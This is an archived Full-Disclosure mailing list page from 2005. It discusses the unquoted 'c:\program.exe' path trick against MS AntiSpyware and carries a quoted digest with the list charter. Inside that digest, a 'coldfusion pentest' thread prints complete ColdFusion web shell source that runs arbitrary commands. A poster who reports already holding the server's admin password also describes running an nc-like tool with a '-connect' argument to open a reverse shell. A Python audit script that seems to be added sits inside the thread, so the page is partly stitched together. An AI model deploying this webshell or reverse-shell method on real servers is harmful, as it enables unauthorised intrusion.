Full Disclosure mailing list archives

RE: Useless tidbit (MS AntiSpyware)


From: Steven Rakick <stevenrakick () yahoo com>
Date: Tue, 10 May 2005 07:30:03 -0700 (PDT)


Interesting. Has this always been that way? While it's not a huge gaping hole, it's definitely concerning. At least to me.

Steve

 

-----Original Message-----
From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of pretty vacant
Sent: Tuesday, May 10, 2005 9:53 AM
To: James Tucker
Cc: full-disclosure () lists grok org uk
Subject: Re: [Full-disclosure] Useless tidbit

You may or may not know that Windows applications often use the registry to store information about where to find applications within their file system. Due to the way in which Windows handles filenames, situations where this information is stored in an unquoted fashion can leave the application open to an attack commonly referred to as the "Program.exe trick".

As you know, it's quite common to have files and/or directories with spaces in the name (e.g. C:\Program Files). Windows is unique in that it essentially doesn't exactly know what it's doing if the command isn't quoted and contains spaces. For example, look at the following command:

c:\program files\windows media player\wmplayer

If unquoted, Windows tries the following:

1st try
  Execute: c:\program.exe
  Arg1: files\windows
  Arg2: media
  Arg3: player\wmplayer

2nd try
  Execute: "c:\program files\windows.exe"
  Arg1: media
  Arg2: player\wmplayer

3rd try
  Execute: "c:\program files\windows media"
  Arg1: player\wmplayer

4th try
  Execute: "c:\program files\windows media player\wmplayer.exe"

Well, in the case of MS AntiSpyware (and hundreds of other applications), it starts up by executing "AntiSpywareMain.exe", which in turn displays a nice splash screen and performs some other misc activities before calling gsasDtServ.exe. The problem is that the execution of gsasDtServ.exe is unquoted: while the app tries to execute c:\program files\microsoft antispyware\gsasDtServ.exe, if c:\program.exe exists it will be executed instead, and MS AntiSpyware never actually gets loaded.

With XPSP2, the OS will actually warn you about files like c:\Program.bat or c:\Program.exe, but not of c:\program files\internet.exe.

Sadly, this isn't uncommon, and when I tested this on my system the first time, 7 applications were executed over a 48 hour period. Try it for yourself. My Program.exe logs the executing user and command args to c:\program.log.

 

 

On Tue, 10 May 2005, James Tucker wrote:

It appears this was a "trick" that I missed, can you provide more info?



thanks.



On 5/9/05, pretty vacant <optimist () eurocompton net> wrote:

Interesting tidbit. The old c:\program.exe trick prevents MS Anti-Spyware from loading at login. :)

_______________________________________________

Full-Disclosure - We believe in it.

Charter: http://lists.grok.org.uk/full-disclosure-charter.html

Hosted and sponsored by Secunia - http://secunia.com/
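The resolution order described in the forwarded post, turned into an audit check (an added example, not code from the post or from any Microsoft tool): it enumerates the candidate executables Windows would try for an unquoted command line and reports which shorter "shadow" paths already exist. The startup entries and the fake filesystem are constructed sample data; the `exists` predicate and the '.exe'-appending rule are assumptions of the example.

```python
"""Unquoted-path audit (added example, not from the post or any Microsoft
tool).  Models the search order the post describes for an unquoted command
line; assumes '.exe' is appended to any prefix lacking an extension."""
from __future__ import annotations
import ntpath
from typing import Callable

def unquoted_candidates(cmdline: str) -> list[tuple[str, list[str]]]:
    """(executable, args) pairs in the order Windows tries them."""
    tokens = cmdline.split(" ")
    tries = []
    for i in range(1, len(tokens) + 1):
        exe = " ".join(tokens[:i])
        if not ntpath.splitext(exe)[1]:  # no extension -> '.exe' appended
            exe += ".exe"
        tries.append((exe, tokens[i:]))
    return tries

def executable_path(cmdline: str) -> str:
    """Path portion: through the first '.exe' (any case), else whole string."""
    end = cmdline.lower().find(".exe")
    return cmdline if end < 0 else cmdline[: end + 4]

def is_unquoted_with_spaces(cmdline: str) -> bool:
    """Exposure exists only if the path contains a space and is unquoted."""
    return not cmdline.startswith('"') and " " in executable_path(cmdline)

def audit(startup: dict[str, str],
          exists: Callable[[str], bool]) -> dict[str, list[str]]:
    """Shadow paths (every candidate but the intended last one) that already
    exist, per exposed entry; `exists` abstracts the filesystem (os.path.exists live)."""
    findings = {}
    for name, cmd in startup.items():
        if is_unquoted_with_spaces(cmd):
            tries = unquoted_candidates(executable_path(cmd))
            findings[name] = [e for e, _ in tries[:-1] if exists(e.lower())]
    return findings

# Constructed sample modelled on the post, plus a fake filesystem (lower-case
# paths) in which a planted c:\program.exe is present.
SAMPLE_STARTUP = {
    "AntiSpyware": r"c:\program files\microsoft antispyware\gsasDtServ.exe",
    "wmplayer": r"c:\program files\windows media player\wmplayer",
    "QuotedTool": r'"C:\Program Files\Vendor\tool.exe" /silent',
    "NoSpaces": r"C:\Windows\system32\notepad.exe",
}
FAKE_FS = {r"c:\program.exe"}
if __name__ == "__main__":
    for exe, args in unquoted_candidates(SAMPLE_STARTUP["wmplayer"]):
        print(f"Execute: {exe}   Args: {args}")
    print(audit(SAMPLE_STARTUP, lambda p: p in FAKE_FS))
```

On a live host the same `audit` can be fed the values of the Run keys or service ImagePath entries with `os.path.exists` as the predicate; the fix for any finding is to quote the path.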







full-disclosure-request () lists grok org uk wrote:

Send Full-Disclosure mailing list submissions to
full-disclosure () lists grok org uk

To subscribe or unsubscribe via the World Wide Web, visit
https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
full-disclosure-request () lists grok org uk

You can reach the person managing the list at
full-disclosure-owner () lists grok org uk

When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."


Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.


Today's Topics:

1. List Charter (John Cartwright)
2. Re: Fwd: GWAVA Sender Notification (Content filter) (James Tucker)
3. Re: coldfusion pentest (fatb)
4. Re: coldfusion pentest (fatb)


----------------------------------------------------------------------

Message: 1
Date: Tue, 10 May 2005 10:02:23 +0100
From: John Cartwright 
Subject: [Full-disclosure] List Charter
To: full-disclosure () lists grok org uk
Message-ID: <20050510090223.GA21817 () grok org uk>
Content-Type: text/plain; charset=us-ascii

Hi

FYI: I have disabled monthly password reminders due to the increasing
problem of archive sites storing them verbatim without filtering. 
Anyone running such an archive is encouraged to change their password
if necessary.

A password reminder is always available via the web interface in any
case. Additionally I have moved to more secure random passwords for
new members.

Cheers
- John

[Full-Disclosure] Mailing List Charter
John Cartwright 


- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing 
list hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily 
concerned with security issues and their discussion. The list is 
administered by John Cartwright.

The Full-Disclosure list is hosted and sponsored by Secunia.


- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface 
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to 
full-disclosure-request () lists grok org uk, send the word 'help' in 
either the message subject or body for details.


- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to 
accept submissions from non-members based on individual merit and 
relevance.

It is expected that the list will be largely self-policing, however in
special circumstances (eg spamming, misappropriation) then offending 
members may be removed from the list by the management.

An archive of postings is available at 
http://lists.grok.org.uk/pipermail/full-disclosure/.


- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for 
instance announcement and discussion thereof, exploit techniques and 
code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is 
forbidden. Disagreements, flames, arguments, and off-topic discussion 
should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. 
Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they 
should use discretion in executing any tools or code distributed via
this list.


- Posting Guidelines -

The primary language of this list is English. Members are expected to 
maintain a reasonable standard of netiquette when posting to the list. 

Quoting should not exceed that which is necessary to convey context, 
this is especially relevant to members subscribed to the digested 
version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will 
preferably be short and to the point, and those containing 
'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or 
S/MIME signatures, proof-of-concept code, etc) but must not be active 
(in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to 
list postings. Offenders will be excluded from the mailing list until 
the problem is corrected.

Members may post to the list by emailing 
full-disclosure () lists grok org uk. Do not send subscription/
unsubscription mails to this address, use the -request address 
mentioned above.


- Charter Additions/Changes -

The list charter will be published at 
http://lists.grok.org.uk/full-disclosure-charter.html.

In addition, the charter will be posted monthly to the list by the 
management.

Alterations will be made after consultation with list members and a 
consensus has been reached.


------------------------------

Message: 2
Date: Tue, 10 May 2005 10:11:56 +0100
From: James Tucker 
Subject: Re: [Full-disclosure] Fwd: GWAVA Sender Notification (Content
filter)
To: "Valdis.Kletnieks () vt edu" 
Cc: full-disclosure () lists grok org uk
Message-ID: 
Content-Type: text/plain; charset=ISO-8859-1

marketing is a "wonderful" thing.

On 5/10/05, Valdis.Kletnieks () vt edu wrote:
On Tue, 10 May 2005 02:32:41 BST, James Tucker said:
Surely this kind of message is a really bad idea.

You know it, I know it, and the A/V vendors know it.

What is the possible true business value of such a filter?

The true business value is for the A/V vendor, who can blat out a
free spam to the forged MAIL FROM: address (which is probably scraped off
a disk by the worm/virus and therefore likely an actual address).

In this case, the bozos at GWAVA can spam you about finding something they
didn't consider acceptable.

What is the potential impact upon security to disclose the information
that this mail does?

It demonstrates that the site running it is lame enough to still be running
A/V software that spams people.

What is the cost of deployment of this system against the costs
related to its potential, and actual effects?

The GWAVA people don't care. They've been paid for the product already, and
they're not the ones paying for the bandwidth.

Remember - you're talking here about a market segment *founded* on the business
model that *partially* patching some other vendor's broken software will lead
to a permanent gravy train. Once you've wrapped your brain around the morals
and ethics of that business model, it's obviously a very tiny step to spamming
other people about the wonders of the product.





------------------------------

Message: 3
Date: Tue, 10 May 2005 17:12:00 +0800
From: "fatb" 
Subject: Re: [Full-disclosure] coldfusion pentest
To: "Javier Reoyo" 
Cc: full-disclosure () lists grok org uk
Message-ID: <007001c55540$cdd9d440$3801a8c0@bill>
Content-Type: text/plain; charset="gb2312"

thx :)

the script from securiteam was from Kurt Grutzmacher originally; it could not run in my box

and I successfully got a working shell by uploading an nc-like tool and using the following script to run it



arguments="-connect 1.1.1. 9999"
timeout="20">




no matter how, I thought many guys who, like me, need a working cf webshell, because the upload script does not allow us to upload exe or some other kinds of files



----- Original Message ----- 
From: "Javier Reoyo" 
To: 
Sent: Tuesday, May 10, 2005 4:31 PM
Subject: Re: [Full-disclosure] coldfusion pentest


Hi fatb,


this is from the securiteam mailing list. Try it.

ColdFusion Web Shell
------------------------------------------------------------------------


SUMMARY



DETAILS

The following source code will generate a web based shell whenever it is
executed under the ColdFusion environment.

Tool source code:
<html>
<body>

<cfoutput>
<table>
<form method="POST" action="cfexec.cfm">
<tr>
<td>Command:</td>
<td><input type=text name="cmd" size=50 <cfif isdefined("form.cmd")>
value="#form.cmd#"</cfif>></td><br>
</tr>
<tr>
<td>Options:</td>
<td><input type=text name="opts" size=50 <cfif
isdefined("form.opts")> value="#form.opts#"</cfif>></td><br>
</tr>
<tr>
<td>Timeout:</td>
<td><input type=text name="timeout" size=4 <cfif
isdefined("form.timeout")> value="#form.timeout#"<cfelse> value="5"</cfif>></td>
</tr>
</table>
<input type=submit value="Exec" >
</form>

<cfif isdefined("form.cmd")>
<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
"#Form.timeout#">
</cfexecute>
</cfsavecontent>

<pre>
#myVar#
</pre>
</cfif>
</cfoutput>

</body>
</html>

ADDITIONAL INFORMATION

The information has been provided by Kurt
Grutzmacher.



========================================

----- Original Message ----- 
From: "fatb" 
To: 

Cc: 
Sent: Tuesday, May 10, 2005 4:43 AM
Subject: [Full-disclosure] coldfusion pentest


Hi all guys

I've succeeded in getting the admin's passwd of the web interface

and I can upload any kinds of files to the server

the server is running coldfusion 4.5 with iis 5.0

but I can not find a coldfusion webshell to continue

anybody could be kind enough to send me a working coldfusion webshell

thx in advance!


--------------------------------------------------------------------------------




------------------------------

Message: 4
Date: Tue, 10 May 2005 17:19:59 +0800
From: "fatb" 
Subject: Re: [Full-disclosure] coldfusion pentest
To: "Javier Reoyo" 
Cc: full-disclosure () lists grok org uk
Message-ID: <007901c55541$7e11ad10$3801a8c0@bill>
Content-Type: text/plain; charset="gb2312"


------------------------------


End of Full-Disclosure Digest, Vol 3, Issue 18
**********************************************


                